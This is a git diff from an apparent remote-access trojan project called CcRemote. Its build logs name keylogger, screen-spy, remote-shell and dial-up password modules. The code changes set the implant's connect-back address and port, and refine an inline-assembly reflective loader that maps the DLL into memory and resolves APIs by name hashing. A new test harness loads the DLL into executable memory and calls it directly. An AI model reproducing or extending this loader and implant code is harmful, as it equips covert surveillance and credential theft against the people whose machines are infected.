diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo index 6803887..4af1ec8 100644 Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ diff --git a/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log b/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log index 3d365a3..fae17d0 100644 --- a/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log +++ b/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log @@ -1,43 +1 @@ -f:\myapp\ccremote\bin\server\ccmaindll.lib -f:\myapp\ccremote\bin\server\ccmaindll.exp -f:\myapp\ccremote\bin\server\ccmaindll.ipdb -f:\myapp\ccremote\bin\server\ccmaindll.iobj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.pch -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.pdb -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.idb -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\pch.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audio.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\until.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\buffer.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\clientsocket.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videomanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videocap.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\systemmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\shellmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\servermanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenspy.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditopt.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditex.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\manager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\keyboardmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\kernelmanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\install.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dialupass.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audiomanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\filemanager.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\strcry.obj -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dllmain.obj -f:\myapp\ccremote\bin\server\ccmaindll.ilk -f:\myapp\ccremote\bin\server\ccmaindll.dll -f:\myapp\ccremote\bin\server\ccmaindll.pdb f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\ccmaindll.write.1u.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.command.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.read.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.write.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.command.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.delete.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.read.1.tlog -f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.write.1.tlog diff --git a/CcMainDll/CcMainDll/Debug/CcMainDll.log b/CcMainDll/CcMainDll/Debug/CcMainDll.log index 719bda5..beffc52 100644 --- a/CcMainDll/CcMainDll/Debug/CcMainDll.log +++ b/CcMainDll/CcMainDll/Debug/CcMainDll.log @@ -166,26 +166,24 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从“ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值 f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决 d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(53): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(263): warning C4996: 'strncpy': This function or variable may be unsafe. Consider using strncpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(264): warning C4996: 'wcstombs': This function or variable may be unsafe. Consider using wcstombs_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdlib.h(1015): note: 参见“wcstombs”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(294): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(230): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(304): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(329): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(358): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(359): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(253): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 StrCry.cpp f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(8): warning C4018: “<=”: 有符号/无符号不匹配 f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 正在生成代码... +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(416): warning C4731: “ReflectiveLoader”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(1091): warning C4731: “ReflectiveLoader”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(322): warning C4731: “GetCurrentPositionAddress”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(324): warning C4731: “GetCurrentPositionAddress”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(333): warning C4731: “call_ror_0xD”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(336): warning C4731: “call_ror_0xD”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(345): warning C4731: “calc_name_hash”: 框架指针寄存器“ebp”被内联程序集代码修改 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(368): warning C4731: “calc_name_hash”: 框架指针寄存器“ebp”被内联程序集代码修改 LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略 正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp LINK : warning LNK4098: 默认库“LIBCMT”与其他库的使用冲突;请使用 /NODEFAULTLIB:library diff --git a/CcMainDll/CcMainDll/dllmain.cpp b/CcMainDll/CcMainDll/dllmain.cpp index 36a90d1..b2f127e 100644 --- a/CcMainDll/CcMainDll/dllmain.cpp +++ b/CcMainDll/CcMainDll/dllmain.cpp @@ -20,7 +20,7 @@ struct Connect_Address char strIP[MAX_PATH]; int nPort; char ActiveXKeyGuid[MAX_PATH]; // 查找创建的Guid -}g_myAddress = { 0xCC28256,"",0,"" }; +}g_myAddress = { 0xCC28256,"127.0.0.1",8088,"" }; char svcname[MAX_PATH]; @@ -392,9 +392,9 @@ enum LocalEnum exp_AddressOfNames = -0x40, AddressOfNameOrdinals = -0x44, lpflOldProtect = -0x48, // VirtualProtect的四个参数 保存老的保护方式 - var_4c = -0x4c, - var_50 = -0x50, - var_54 = -0x54, + Signature = -0x4c, + NumberOfSections = -0x50, + IndexOfSections = -0x54, var_58 = -0x58, var_5c = -0x5c, var_60 = -0x60, @@ -403,7 +403,7 @@ enum LocalEnum address = -0x6c, var_70 = -0x70, EntryPoint = -0x74, // 入口点 - NewMemAddress = -0x78 // 申请用来展开PE的内存地址 + NewMemAddress = -0x78 // 申请用来展开PE的内存地址 }; @@ -423,7 +423,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader() jnz initLocalVar call GetCurrentPositionAddress // 获取当前位置地址 - mov eax, buffer + //mov eax, buffer mov [ebp + PEAddress], eax // 保存当前代码所在的地址 PEAddress addressAdd : mov eax, 1 @@ -718,39 +718,39 @@ extern "C" __declspec(dllexport) void ReflectiveLoader() mov edx, [ebp+PEAddress] mov eax, [ebp+PEAddress] add eax, [edx+3Ch] - mov [ebp+var_4c], eax + mov [ebp+Signature], eax push 0x04 // PAGE_READWRITE 区域不可执行代码,应用程序可以读写该区域 push 0x3000 // MEM_COMMIT | MEM_RESERV - mov ecx, [ebp+var_4c] + mov ecx, [ebp+Signature] mov edx, [ecx+0x50] // PE signature 0x18 + 0x38 SizeOfImage 映像装入内存后的总大小 add edx, 0x3C00000 // dwSize push edx push 0x0 call [ebp+ pVirtualAlloc] // 申请一块 0x3C0000+SizeOfImage大小的内存 mov [ebp+NewMemAddress], eax // NewMemAddress = 申请的内存地址 - mov eax, [ebp+var_4c] // var_4c = signature + mov eax, [ebp+Signature] // Signature = signature mov ecx, [eax+0x54] // ecx = SizeOfHeaders 0x18 + 0x3c mov [ebp+varLocalFS30_B], ecx mov edx, [ebp+PEAddress] // PEAddress = 4D5A address mov [ebp+BaseDllName], edx // BaseDllName = PEAddress mov eax, [ebp+NewMemAddress] mov [ebp+name_hash], eax // name_hash = mem_address - mov ecx, [ebp+var_4c] + mov ecx, [ebp+Signature] movzx edx, word ptr [ecx+0x14] // edx = WORD SizeOfOptionalHeader - mov eax, [ebp+var_4c] + mov eax, [ebp+Signature] lea ecx, [eax+edx+0x18] // signature + SizeOfOptionalHeader + sizeof signature = struct _IMAGE_SECTION_HEADER address 区段地址 mov [ebp+varLocalFS30_B], ecx // varLocalFS30_B = 区段地址 - mov edx, [ebp+var_4c] + mov edx, [ebp+Signature] movzx eax, word ptr [edx+0x06] // signature + 0x04 + 0x02 - mov [ebp+var_50], eax // var_50 = NumberOfSections 节的数量 + mov [ebp+NumberOfSections], eax // NumberOfSections = NumberOfSections 节的数量 loc_463585: - mov ecx, [ebp+var_50] - mov [ebp+var_54], ecx // var_54 = 剩余要处理的Sections数量 index - mov edx, [ebp+var_50] + mov ecx, [ebp+NumberOfSections] + mov [ebp+IndexOfSections], ecx // IndexOfSections = 剩余要处理的Sections数量 index + mov edx, [ebp+NumberOfSections] sub edx, 1 - mov [ebp+var_50], edx - cmp dword ptr[ebp+var_54], 0 // 区段是否都处理了 + mov [ebp+NumberOfSections], edx + cmp dword ptr[ebp+IndexOfSections], 0 // 区段是否都处理了 jz loc_463614 mov eax, [ebp+varLocalFS30_B] // varLocalFS30_B = 区段地址 mov ecx, [ebp+NewMemAddress] // NewMemAddress = mem_address @@ -803,7 +803,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader() loc_463614: mov ecx, 8 shl ecx, 0 // [1] 数据目录表第二项 导入表 IMAGE_DIRECTORY_ENTRY_IMPORT - mov edx, [ebp+var_4c] // var_4c = signature + mov edx, [ebp+Signature] // Signature = signature lea eax, [edx+ecx+0x78] // 0x78 + 0x08 mov [ebp+BaseDllName], eax mov ecx, [ebp+BaseDllName] @@ -906,13 +906,13 @@ loc_46371B: jmp loc_463631 // 下一个导入表结构 loc_463729: - mov eax, [ebp+var_4c] // var_4c = signature + mov eax, [ebp+Signature] // Signature = signature mov ecx, [ebp+NewMemAddress] // NewMemAddress = mem_address sub ecx, [eax+0x34] // 当前加载基址 - 默认加载基址 meMaddress - ImageBase mov [ebp+address], ecx mov edx, 8 imul eax, edx, 5 // 第6个表 重定位表 - mov ecx, [ebp+var_4c] + mov ecx, [ebp+Signature] lea edx, [ecx+eax+0x78] mov [ebp+BaseDllName], edx mov eax, [ebp+BaseDllName] @@ -1060,7 +1060,7 @@ loc_4638E1: loc_4638F2: - mov edx, [ebp+var_4c] // var_4c = signature + mov edx, [ebp+Signature] // Signature = signature mov eax, [ebp+NewMemAddress] // NewMemAddress = mem_address add eax, [edx+0x28] // 入口点 mov [ebp+EntryPoint], eax diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log index 462cbac..b440f42 100644 --- a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log +++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log @@ -1,3 +1,6 @@ C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 TestLoadDll.cpp +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(22): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(119): warning C4700: 使用了未初始化的局部变量“lpflOldProtect” TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log index 0186fd2..f1eb298 100644 --- a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log +++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log @@ -1 +1,14 @@ -g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe +f:\myapp\ccremote\ccmaindll\testloaddll\release\vc141.pdb +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.obj +f:\myapp\ccremote\bin\server\testloaddll.exe +f:\myapp\ccremote\bin\server\testloaddll.pdb +f:\myapp\ccremote\bin\server\testloaddll.ipdb +f:\myapp\ccremote\bin\server\testloaddll.iobj +f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.write.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\testloaddll.write.1u.tlog diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.log index a8aad37..2271ea3 100644 --- a/CcMainDll/TestLoadDll/Release/TestLoadDll.log +++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.log @@ -1,6 +1,9 @@ -G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 +C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 TestLoadDll.cpp +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 正在生成代码 - All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(120): warning C4700: 使用了未初始化的局部变量“lpflOldProtect” + All 161 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 已完成代码的生成 - TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe + TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate b/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate index fd0ad53..3f4a20c 100644 --- a/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate +++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate @@ -1,2 +1,2 @@ #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 -Release|Win32|G:\CcRemote\CcRemote\CcMainDll\| +Release|Win32|F:\myapp\CcRemote\CcMainDll\| diff --git a/CcMainDll/TestLoadDll/TestLoadDll.cpp b/CcMainDll/TestLoadDll/TestLoadDll.cpp index f01b85d..416654f 100644 --- a/CcMainDll/TestLoadDll/TestLoadDll.cpp +++ b/CcMainDll/TestLoadDll/TestLoadDll.cpp @@ -4,9 +4,88 @@ #include #include -int main() + + +FILE * pFile; + +long lSize; + +char * buffer; + +size_t result; +bool InitTestReflectiveLoader() { - std::cout << "Hello World!\n"; + + + // 一个不漏地读入整个文件,只能采用二进制方式打开 + + //pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb"); + pFile = fopen("C:\\Users\\b\\Desktop\\bin\\server\\CcMainDll.dll", "rb"); + + if (pFile == NULL) + + { + + fputs("File error", stderr); + + printf("open file fail"); + + return false; + + } + + + + // 获取文件大小 + + fseek(pFile, 0, SEEK_END); + + lSize = ftell(pFile); + + rewind(pFile); + + + + // 分配内存存储整个文件 + + buffer = (char*)VirtualAlloc(NULL , sizeof(char)*lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + if (buffer == NULL) + + { + + fputs("Memory error", stderr); + + printf("Memory alloc falil"); + + return false; + + } + + + + // 将文件拷贝到buffer中 + + result = fread(buffer, 1, lSize, pFile); + + if (result != lSize) + + { + + fputs("Reading error", stderr); + + printf("Load file to memory falil"); + + return false; + + } + return true; + +} + +void loadCcmainDllExp() +{ + std::cout << "Hello World!\n"; //载入服务端dll hijack test HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll"); @@ -32,3 +111,16 @@ int main() } } + +int main() +{ + + InitTestReflectiveLoader(); + PDWORD lpflOldProtect; + VirtualProtect(buffer, lSize, PAGE_EXECUTE_READWRITE, lpflOldProtect); + __asm { + call buffer + } + + return 0; +} diff --git a/CcMainDll/TestLoadDll/TestLoadDll.vcxproj b/CcMainDll/TestLoadDll/TestLoadDll.vcxproj index a3c364d..7491d89 100644 --- a/CcMainDll/TestLoadDll/TestLoadDll.vcxproj +++ b/CcMainDll/TestLoadDll/TestLoadDll.vcxproj @@ -92,7 +92,7 @@ MaxSpeed true true - true + false WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug @@ -110,7 +110,7 @@ Level3 Disabled - true + false WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll index 03e37bb..1dd1147 100644 Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ diff --git a/bin/server/TestLoadDll.exe b/bin/server/TestLoadDll.exe index e8f4295..1be63e4 100644 Binary files a/bin/server/TestLoadDll.exe and b/bin/server/TestLoadDll.exe differ